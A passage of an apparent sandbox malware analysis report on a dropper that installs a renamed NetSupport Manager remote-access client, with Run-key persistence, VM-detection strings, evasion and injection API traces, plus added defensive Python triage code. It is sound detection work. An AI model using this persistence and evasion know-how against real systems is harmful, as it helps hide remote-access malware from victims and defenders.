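def find_rsds_records(data: bytes) -> list[CodeViewRecord]:
    """Scan a buffer (file or memory dump) for RSDS records.

    Layout: b"RSDS" | 16-byte GUID (little-endian fields) | uint32 age |
    NUL-terminated PDB path. Hits whose path does not end in .pdb are
    discarded, which filters out stray "RSDS" byte sequences.
    """
    records: list[CodeViewRecord] = []
    for match in re.finditer(rb"RSDS", data):
        off = match.start()
        if off + 24 > len(data):
            continue
        guid = uuid.UUID(bytes_le=data[off + 4:off + 20])
        age = struct.unpack_from("<I", data, off + 20)[0]
        end = data.find(b"\x00", off + 24)
        if end == -1:
            continue
        try:
            path = data[off + 24:end].decode("ascii")
        except UnicodeDecodeError:
            continue
        if not path.lower().endswith(".pdb"):
            continue
        records.append(CodeViewRecord(guid, age, path, off))
    return records


def classify_pdb_path(pdb_path: str) -> str:
    """Map a PDB path to the build tree it came from (assumed prefixes)."""
    p = pdb_path.lower()
    if p.startswith(NETSUPPORT_BUILD_PREFIX):
        return "netsupport-manager"
    if WINRAR_SFX_MARKER in p:
        return "winrar-sfx-stub"
    return "unknown"


def build_sample_blob() -> bytes:
    """Constructed test input: one fake RSDS record using the client32.pdb
    path from the report, with padding before and junk after it."""
    guid = uuid.UUID("12345678-1234-5678-1234-567812345678")  # made up
    path = b"E:\\nsmsrc\\nsm\\1210\\1210\\client32\\Release\\client32.pdb"
    return (b"\x00" * 16 + b"RSDS" + guid.bytes_le + struct.pack("<I", 3)
            + path + b"\x00" + b"\xcc" * 8)


if __name__ == "__main__":
    for rec in find_rsds_records(build_sample_blob()):
        print(f"{rec.offset:#x} {rec.symbol_key} {rec.pdb_path} "
              f"-> {classify_pdb_path(rec.pdb_path)}")
```

Run it against the dropped files (`find_rsds_records(open(path, "rb").read())`) or against the .sdmp memory regions the report cites; a NetSupport build path in a binary named bild.exe is the quickest confirmation that the file is a renamed client32.exe rather than a custom implant.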

                                Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe (4 instances)
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | File created: C:\Users\Public\Netstat\TCCTL32.DLL
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | File created: C:\Users\Public\Netstat\msvcr100.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | File created: C:\Users\Public\Netstat\pcicapi.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | File created: C:\Users\Public\Netstat\remcmdstub.exe
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | File created: C:\Users\Public\Netstat\bild.exe
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | File created: C:\Users\Public\Netstat\HTCTL32.DLL
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | File created: C:\Users\Public\Netstat\PCICHEK.DLL
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | File created: C:\Users\Public\Netstat\PCICL32.DLL
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_6C5E7030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_6C5D5490 GetPrivateProfileIntA
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_6C5D50E0 CreateFileA,wsprintfA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_6C5D5117 GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError
Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Netstat (2 instances)
Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Netstat (2 instances)
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11112670 IsIconic,GetTickCount
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_11112670 IsIconic,GetTickCount
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId
Source: C:\Users\Public\Netstat\bild.exe | Code function: 6_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11143570 GetTickCount,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Netstat\bild.exe | Process information set: NOOPENFILEERRORBOX
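The rows above record the whole persistence chain: cmd.exe spawns reg.exe four times, the Run value Netstat is written under both HKEY_CURRENT_USER and HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node, and the NetSupport components are dropped into C:\Users\Public\Netstat. The Python below is an added triage example, not code from Joe Sandbox, that turns such evidence rows into a summary and applies the same "Run key pointing into a suspicious folder" logic as the Sigma match listed in the overview. The row list is constructed from the report's own rows with the dropper renamed sample.exe; the SUSPICIOUS_DIRS list and the Run value data used in the check are assumptions, because the report shows the value name but not its data.

```python
"""Persistence triage over sandbox evidence rows (added example, not Joe Sandbox code)."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample: (source process, detail) pairs taken from the report's
# persistence rows, with the link text removed and the dropper renamed.
SAMPLE_ROWS = [
    ("C:\\Windows\\SysWOW64\\cmd.exe", "Process created: reg.exe"),
    ("C:\\Windows\\SysWOW64\\cmd.exe", "Process created: reg.exe"),
    ("C:\\Windows\\SysWOW64\\cmd.exe", "Process created: reg.exe"),
    ("C:\\Windows\\SysWOW64\\cmd.exe", "Process created: reg.exe"),
    ("C:\\Users\\user\\Desktop\\sample.exe", "File created: C:\\Users\\Public\\Netstat\\bild.exe"),
    ("C:\\Users\\user\\Desktop\\sample.exe", "File created: C:\\Users\\Public\\Netstat\\PCICL32.DLL"),
    ("C:\\Users\\user\\Desktop\\sample.exe", "File created: C:\\Users\\Public\\Netstat\\remcmdstub.exe"),
    ("C:\\Windows\\SysWOW64\\reg.exe",
     "Registry value created or modified: HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run Netstat"),
    ("C:\\Windows\\SysWOW64\\reg.exe",
     "Registry value created or modified: HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run Netstat"),
]

# Assumption: user-writable folders that a loader typically drops into and
# that legitimate autoruns rarely point at.
SUSPICIOUS_DIRS = ("c:\\users\\public\\", "c:\\programdata\\", "\\appdata\\local\\temp\\")

_RUN_RE = re.compile(
    r"^Registry value created or modified: (?P<hive>HKEY_[A-Z_]+)\\(?P<key>.+\\CurrentVersion\\Run) (?P<name>\S+)$")
_FILE_RE = re.compile(r"^File created: (?P<path>.+)$")
_PROC_RE = re.compile(r"^Process created: (?P<image>.+)$")


def in_suspicious_dir(path: str) -> bool:
    """True when the path lies below one of SUSPICIOUS_DIRS (case-insensitive)."""
    p = path.lower()
    return any(d in p for d in SUSPICIOUS_DIRS)


def is_suspicious_autorun(value_data: str) -> bool:
    """Sigma-style check on a Run value's data: does the executable it launches
    live in a suspicious folder? Handles quoted and unquoted command lines."""
    data = value_data.strip()
    if data.startswith('"'):
        exe = data[1:].split('"', 1)[0]
    else:
        exe = data.split(" ", 1)[0]
    return in_suspicious_dir(exe)


@dataclass
class PersistenceSummary:
    reg_exe_spawns: int = 0
    autorun_values: dict[str, set[str]] = field(default_factory=dict)  # value name -> hives
    dropped_files: list[str] = field(default_factory=list)
    dropped_in_suspicious_dir: list[str] = field(default_factory=list)

    @property
    def verdict(self) -> str:
        both_hives = any({"HKEY_CURRENT_USER", "HKEY_LOCAL_MACHINE"} <= hives
                         for hives in self.autorun_values.values())
        if self.autorun_values and self.dropped_in_suspicious_dir:
            return "autorun-plus-suspicious-drop" + (" (user and machine hive)" if both_hives else "")
        if self.autorun_values:
            return "autorun-only"
        return "no-persistence-evidence"


def summarize(rows) -> PersistenceSummary:
    """Fold evidence rows into counts of reg.exe spawns, Run values and drops."""
    s = PersistenceSummary()
    for _source, detail in rows:
        if (m := _PROC_RE.match(detail)) and m["image"].lower() == "reg.exe":
            s.reg_exe_spawns += 1
        elif m := _FILE_RE.match(detail):
            s.dropped_files.append(m["path"])
            if in_suspicious_dir(m["path"]):
                s.dropped_in_suspicious_dir.append(m["path"])
        elif m := _RUN_RE.match(detail):
            s.autorun_values.setdefault(m["name"], set()).add(m["hive"])
    return s


if __name__ == "__main__":
    summary = summarize(SAMPLE_ROWS)
    print(summary.verdict, summary.autorun_values, summary.reg_exe_spawns)
    # Assumed value data: the report does not show what "Netstat" points to.
    print(is_suspicious_autorun('"C:\\Users\\Public\\Netstat\\bild.exe"'))
```

Writing the value into both hives means the autorun survives whether or not the user had administrative rights, and the HKLM path under WOW6432Node is simply the 32-bit registry view that the SysWOW64 reg.exe is redirected to; a hunt for this value should therefore query both the native and the WOW6432Node Run keys.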

                                Malware Analysis System Evasion

                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C5D91F05_2_6C5D91F0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C5E4F305_2_6C5E4F30
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_110B8200 Sleep,ExitProcess,5_2_110B8200
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110B8200 Sleep,ExitProcess,6_2_110B8200
                                Source: C:\Users\Public\Netstat\bild.exeWindow / User API: threadDelayed 427Jump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeWindow / User API: threadDelayed 8031Jump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeDropped PE file which has not been started: C:\Users\Public\Netstat\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeDropped PE file which has not been started: C:\Users\Public\Netstat\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeDropped PE file which has not been started: C:\Users\Public\Netstat\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decisiongraph_5-94273
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decisiongraph_5-95465
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decisiongraph_5-96148
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decisiongraph_5-99497
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decisiongraph_5-99895
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\bild.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\Public\Netstat\bild.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_5-99636
                                Source: C:\Users\Public\Netstat\bild.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_5-99387
                                Source: C:\Users\Public\Netstat\bild.exeAPI coverage: 6.1 %
                                Source: C:\Users\Public\Netstat\bild.exeAPI coverage: 2.6 %
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C5E4F305_2_6C5E4F30
                                Source: C:\Users\Public\Netstat\bild.exe TID: 7724Thread sleep time: -59250s >= -30000sJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exe TID: 7728Thread sleep time: -42700s >= -30000sJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exe TID: 7724Thread sleep time: -2007750s >= -30000sJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\Public\Netstat\bild.exeLast function: Thread delayed
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C5E3130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6C5E3226h5_2_6C5E3130
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D7A273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00D7A273
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D8A537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00D8A537
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,5_2_1102D330
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,5_2_11065890
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,5_2_1106A0A0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,5_2_111266E0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,5_2_1110AFD0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,6_2_1102D330
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,6_2_11065890
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,6_2_1106A0A0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,6_2_111266E0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,6_2_1110AFD0
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D8C8D5 VirtualQuery,GetSystemInfo,0_2_00D8C8D5
                                Source: HTCTL32.DLL.0.drBinary or memory string: VMware
                                Source: bild.exe, 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.claal*
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1708628358.000000000106B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: HTCTL32.DLL.0.dr | Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: TCCTL32.DLL.0.dr | Binary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
Source: bild.exe, 0000000A.00000003.1907595344.000000000095F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1708628358.000000000106B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: bild.exe, 00000005.00000002.4162765442.00000000056A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4161642806.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: HTCTL32.DLL.0.dr | Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
Source: TCCTL32.DLL.0.dr | Binary or memory string: VMWare
Source: bild.exe, 00000006.00000003.1826499959.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 0000000B.00000003.1988483840.0000000001130000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | API call chain: ExitProcess graph end node (graph_0-22429)
Source: C:\Users\Public\Netstat\bild.exe | API call chain: ExitProcess graph end node (graph_5-94341)
Source: C:\Users\Public\Netstat\bild.exe | API call chain: ExitProcess graph end node (graph_5-94972)
Source: C:\Users\Public\Netstat\bild.exe | API call chain: ExitProcess graph end node (4 further occurrences)
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D8DA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11147750 GetLastError,wsprintfA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,SetLastError,GetKeyState
Source: C:\Users\Public\Netstat\bild.exe | Code function: 5_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D94A5A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D98AAA GetProcessHeap
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe | Code function: 0_2_00D8DA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
